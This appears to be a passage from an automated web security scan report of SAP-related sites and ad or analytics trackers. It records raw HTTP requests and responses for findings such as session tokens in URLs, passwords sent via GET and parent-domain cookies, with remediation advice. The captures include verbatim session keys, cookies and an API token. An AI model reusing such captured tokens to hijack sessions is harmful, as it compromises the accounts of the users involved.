Location: http://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

9.7. https://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/37021986/?&visitor=5140389589811&msessionkey=1316108311517485489&site=37021986&cmd=mTagUrl&lpCallId=653687120463-736978869550&protV=20&lpjson=1&SV%21impression-query-name=voice-sales-sap-sme-us-en-1&SV%21impression-query-room=voice-sales-sap-sme-us-en-1&id=2404879032&info=button-impression%3Avoice-sales-sap-sme-us-en-1%28SAP%20-%20Contact%20SAP%29&waitForVisitor=true&d=1318691650602&page=https%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: HumanClickKEY=1316108311517485489; HumanClickSiteContainerID_37021986=STANDALONE; ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:13:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:13:52 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"653687120463-736978869550","lpCallConfirm":"","lpData":[{"result":56}]}});
9.8. http://sapglobalmarketingin.tt.omtrdc.net/m2/sapglobalmarketingin/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sapglobalmarketingin.tt.omtrdc.net
Path:   /m2/sapglobalmarketingin/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/sapglobalmarketingin/sc/standard?mboxHost=store.businessobjects.com&mboxSession=1318689062767-959486&mboxPage=1318689062767-959486&mboxCount=1&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1318671062929&visitorID=50271dcd9baa4ef3893c9fb47c6b6fd7&visitorNamespace=sap&pageName=estores%3Aus%3Ahomepage&currencyCode=USD&channel=estores&server=estores&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=1326&browserHeight=890&dynamicAccountSelection=true&dynamicAccountList=sapvbudev%3Ddigitalriver.com&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=true&linkDownloadFileTypes=rar%2Cexe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=streamwork.com%2Csapstreamwork.com%2Caboutsapcampbell.com%2Canalytics-usa.com%2Cestara.com%2Cbestsapchina.com%2Cbusinessobjects.com%2Cbusinessobjects.com.pl%2Cbusiness-objects.com.pl%2Cbusinessobjects.pl%2Cbusiness-objects.pl%2Ccareersatsap.com%2Ccfolder.de%2Ccfolders.com%2Ccfolders.de%2Ccfolders.net%2Ccrystalreports.com%2Cdigitalriver.com%2Cedusap.at%2Cfazi.at%2Cfazi.com%2Cfazi.de%2Cfuturefactoryinitiative.com%2Cfuturefactoryinitiative.org%2Cfuzzy.at%2Cfuzzy.ch%2Cfuzzy-informatik.com%2Cfuzzy-informatik.de%2Cfuzzy-online.com%2Cfuzzy-online.de%2Cinfommersion.com%2Condemand.com%2Csap.at%2Csap.bg%2Csap.biz%2Csap.ca%2Csap.ch%2Csap.cl%2Csap.cn%2Csap.co.at%2Csap.co.il%2Csap.co.jp%2Csap.co.kr%2Csap.co.nz%2Csap.co.th%2Csap.co.uk%2Csap.co.za%2Csap.com%2Csap.com.au%2Csap.com.cn%2Csap.com.pl%2Csap.com.sg%2Csap.com.tr%2Csap.com.tw%2Csap.cz%2Csap.de%2Csap.ee%2Csap.fi%2Csap.hk%2Csap.hr%2Csap.hu%2Csap.ie%2Csap.in%2Csap.info%2Csap.kz%2Csap.lu%2Csap.nl%2Csap.pl%2Csap.pt%2Csap.ro%2Csap.ru%2Csap.si%2Csap.sk%2Csap.tw%2Csap.ua%2Csap.us%2Csapag.de%2Csap-ag.de%2Csapamerica.com%2Csap-answer.com%2Csap-austria.com%2Csap-best-fit-adviser.com%2Csapbusinessbydesign.cn%2Csapbusinessbydesign.co.uk%2Csapbusinessbydesign.com%2Csapbusinessbydesign.de%2Csapbusinessbydesign.us%2Csapbusinessobjects.com.pl%2Csap-business-objects.com.pl%2Csapbusinessobjects.pl%2Csap-business-objects.pl%2Csapbusinessobjectsresponses.com%2Csapbusinessone.pl%2Csap-campbell.com%2Csapcampbell.net%2Csapcampbell.org%2Csapchina.com%2Csapclear.com%2Csapconfigurator.com%2Csapdesignguild.org%2Csap-event.jp%2Csapevents.com%2Csap-forum.de%2Csap-insights.com%2Csapkhimetrics.com%2Csaplabs.bg%2Csaplabs.co.in%2Csaplabs.fr%2Csaplabs.in%2Csapnetweaver.com%2Csapphirenow.com%2Csap-retail.de%2Csapsapphire.com%2Csapsem.com%2Csap-spectrum.com%2Csapstreamwork.com%2Csapteched.com%2Csapthai.com%2Csapturkiye.com.tr%2Csap-tv.com%2Csapventures.com%2Csapworldtour.com%2Csapworldtour2010.com%2Csteeb.de%2Csap.corp%2Csaplabs.com%2Csybase.com%2Csappartneredge.eu%2Cjavascript%3A%2Cstore.businessobjects.com&linkTrackVars=visitorID%2Cserver&linkTrackEvents=None&prop1=na&eVar1=estores%3Aus&hier1=estores%2Cna%2Cus&prop2=english&eVar2=english&eVar3=estores&prop5=us&prop8=new&eVar8=new&prop9=logN&eVar9=logN&eVar13=CG4DA4BC51&prop14=logN%7Cestores%3Aus%3Ahomepage&prop15=null%7Cestores%3Aus%3Ahomepage&eVar15=%7C&eVar18=%2B1&eVar19=estores%2Cna%2Cus&eVar20=estores%3Aus%3Ahomepage&eVar35=http%3A%2F%2Fwww.sap.com%2Findex.epx&eVar36=CG4DA4BC51&prop38=saturday%7C4%3A30pm&eVar38=saturday%7C4%3A30pm&prop47=1&prop50=estores%3A2011.04.18%7Cgl%3A2011.09.07&mboxURL=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.%2B77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: sapglobalmarketingin.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Sat, 15 Oct 2011 14:30:44 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318689062767-959486.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
9.9. https://teched2011madrid.sapevents.com/index.cfm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /index.cfm?fuseaction=reg.Login&error=75&sEmail=&sTandC=Yes&sCountry=&CFID=960984&CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://teched2011madrid.sapevents.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:39 GMT
Content-Length: 48423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
9.10. http://www.sapteched.com/emea/about/whoshouldattend.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.sapteched.com
Path:   /emea/about/whoshouldattend.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /emea/about/whoshouldattend.htm HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; __utma=48829220.526440815.1318688537.1318688537.1318688537.1; __utmb=48829220.2.10.1318688537; __utmc=48829220; __utmz=48829220.1318688537.1.1.utmcsr=teched2011madrid.sapevents.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 33557
Content-Type: text/html; Charset=utf-8
Expires: Sat, 15 Oct 2011 14:23:53 GMT
Cache-control: private
Content-Length: 33557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAP TechEd 201
...[SNIP]...
<td width="180" style="display:block; word-wrap: break-word"><script src="http://nmp.newsgator.com/NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862" type="text/javascript"></script>
...[SNIP]...
10. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Home</title>
<meta
...[SNIP]...
</ul>
   
   <form onsubmit="Login.submit('mini');" action="javascript:void(0);">
       <div class="field">
...[SNIP]...
</label>
           <input type="password" name="Password" id="mini_pass" class="text" value="Password" />
       </div>
...[SNIP]...
11. Cookie scoped to parent domain  previous  next
There are 71 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

11.1. https://s.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://s.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10002109824374&v=4.47&enc=utf-8&f=https%3A//www.sap.com/sme/contactsap/index.epx&b=Contact%20SAP&c=sme&x=07&cf3=Contact_General&cf4=Contact_General&cf17=Global&e=http%3A//burp/show/12&flv=WIN%2010%2C3%2C183%2C10&d=Sat%2C%2015%20Oct%202011%2015%3A15%3A41%20UTC&n=5&g=en-us&h=Y&j=1920x1200&k=16&l=true&ittidx=0&fpc=M7bgHDDi%7CKd30fNBLaa%7Cfses10002109824374%3D%7CKd30fNBLaa%7CM7bgHDDi%7Cfvis10002109824374%3DZj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA%3D%3D%7C8M8o0780sT%7C8M8o0780sT%7C8M8o0780sT%7C8%7C8M8o0780sT%7C8M8o0780sT HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: s.analytics.yahoo.com
Connection: Keep-Alive
Cookie: B=bbb07qp77cca3&b=3&s=p1; itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|M|8M8o0780Hs|T; itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:15:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com
TS: 0 205 dc4_ird
Pragma: no-cache
Expires: Sat, 15 Oct 2011 15:15:24 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 205 dc4_ird

11.2. http://www.sap.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sap.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: nwt=wetnow; path=/
Set-Cookie: ARPT=ONKKMMS169.145.6.18CKMMM; path=/
Cache-Control: private
Content-Length: 0
Location: /index.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:42 GMT; path=/
Set-Cookie: session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; domain=.sap.com; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:42 GMT

11.3. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http%3A%2F%2Fcf.addthis.com%2Fred%2Fusync%3Fpid%3D6%26puid%3D%24UID HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://s7.addthis.com/static/r07/sh62.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ib.adnxs.com
Proxy-Connection: Keep-Alive
Cookie: uuid2=2595517907636879217; anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LUMbNT[>XcvbRA4C$WRZ?#9'2MGirFg`7sCI.4J%bAJ=l!m^+^_v3JmS<A)1moZ?Hd3oR9w[++-fe/Lf@X:1j+#tuLV-.(`K

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=2595517907636879217; path=/; expires=Fri, 13-Jan-2012 15:28:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Sun, 16-Oct-2011 15:28:17 GMT; domain=.adnxs.com; HttpOnly
Location: http://cf.addthis.com/red/usync?pid=6&puid=2595517907636879217
Date: Sat, 15 Oct 2011 15:28:17 GMT
Content-Length: 0

11.4. http://ib.adnxs.com/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /px

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /px?id=22928&t=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: ib.adnxs.com
Cookie: sess=1; uuid2=2911719892711954938; anj=Kfu=8fG6Q/Cxrx)0s]#%2L_'x%SEV/^U7g%1P6-Z

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=2911719892711954938; path=/; expires=Fri, 13-Jan-2012 13:51:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Sun, 16-Oct-2011 13:51:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG6Q/Cxrx)0s]#%2L_'x%SEV/^U7g%1P6-Z; path=/; expires=Fri, 13-Jan-2012 13:51:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 15 Oct 2011 13:51:40 GMT
Content-Length: 0

11.5. http://reservoir.marketstudio.net/reservoir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reservoir.marketstudio.net
Path:   /reservoir

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /reservoir?d=http%3A%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2FDisplayHomePage%2Fpgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3D__RESID__%26rests%3D1318689037443&t=commerce&p=globalcommerce&p1=bobjamer&p2=40461809026&p3=newsession HTTP/1.1
Host: reservoir.marketstudio.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:30:39 GMT
Server: Apache
X-Server-Name: resweb@dc1web53
Set-Cookie: RESID=TmOIUAoBAlUAAARDMJwAAAAN; path=/; domain=marketstudio.net; expires=Sun, 20-Oct-2030 01:09:39 GMT
Location: http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443
Content-Length: 339
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://store.businessobjects.com/store/bobjamer
...[SNIP]...
11.6. http://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155 HTTP/1.1
Host: sales.liveperson.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: HumanClickKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=546022977410,d=1312768968; ASPSESSIONIDAQRTCCCS=DEKHLFDCHJEEJDBFGMOFPDEK

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 15 Oct 2011 14:55:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Set-Cookie: LivePersonID=-546022977410-1318690536:-1:-1:-1:-1; expires=Sun, 14-Oct-2012 14:55:47 GMT; path=/hc/37021986; domain=.liveperson.net
Location: https://sales.liveperson.net/hc/37021986/?cmd=file&file=visitorWantsToTalk&site=37021986&visitor=546022977410&msessionkey=449600187523043155&SV!EngageRoom=sales-sap-general-us-en&SV!chat-button-name=voice-sales-sap-general-us-en-1&SV!chat-button-room=voice-sales-sap-general-us-en-1&referrer=(button%20dynamic-button:voice-sales-sap-general-us-en-1(SAP%20Business%20Management%20Software%20Solutions%2C%20Applications%20and%20Services%20%7C%20SAP))%20http%3A//www.sap.com/index.epx&visitor=546022977410&msessionkey=449600187523043155
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0

11.7. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /global/scripts/targeting/dyn_prop.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/targeting/dyn_prop.php HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; s_sv_p1=1@26@s/7243/7019/7341/6423&e/15; mbox=check#true#1318631931|session#1318631777052-118529#1318633731|PC#1318631777052-118529.19#1319841471; mbox-staging=check#true#1318631939|session#1318631787015-280970#1318633739|PC#1318631787015-280970.19#1319841479

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Sat, 15 Oct 2011 17:47:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Mon, 04 Oct 2010 17:31:59 GMT
xserver: www5.dmz
Content-Length: 483
Content-Type: application/javascript
Date: Sat, 15 Oct 2011 13:47:00 GMT
Connection: close
Set-Cookie: omniture_unique=fe0e6c91699884f68443ba47d4700abf; path=/; domain=omniture.com
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

mboxCreate('omniTargetingInfo',
'profile.geo_ip=50.23.123.106',
